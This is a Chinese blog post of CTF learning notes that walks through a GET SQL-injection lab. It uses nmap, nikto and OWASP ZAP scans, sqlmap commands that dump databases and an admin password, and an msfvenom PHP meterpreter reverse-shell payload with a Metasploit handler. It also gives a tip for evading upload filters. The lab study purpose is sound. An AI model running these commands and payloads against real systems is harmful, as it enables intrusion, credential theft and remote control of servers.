我的CTF学习与教学之旅笔记5

sql注入之get


SQL注入简介:


nmap -A -T4 -v -p- -oX 140.xml 10.10.10.140

nikto -host 10.10.10.151

手动构造sql注入语句,没有成功


接下来要用web应用安全漏洞扫描器:

owasp-zap扫描网站是否存在注入漏洞和XSS漏洞,发现相关URL

sqlmap -u "http://10.10.10.151/cat.php?id=3" --dbs
 

利用sqlmap -u url 等等进一步探测

如:sqlmap -u url --dbs 扫描所有数据库

sqlmap -u url -D "数据库名" --tables 查看数据库下的数据表 

sqlmap -u url -D “数据库”  -T “数据表” -C “属性列表(逗号隔开)” --dump      :获取指定数据

找到数据库密码后,可以尝试登陆后台管理系统,查找是否有upload文件漏洞

+-------+---------------------------------------------+
| login | password                                    |
+-------+---------------------------------------------+
| admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+-------+---------------------------------------------+
 

制作反射木马:msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=端口号 -f raw 

并启动msfconsole中的exploit/multi/handler

set payload php/meterpreter/reverse_tcp 

经验:如果不让直接上传php文件,可以尝试改为PHP后再上传

远程浏览刚上传的反射木马文件,启动meterpreter,开始进一步渗透

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值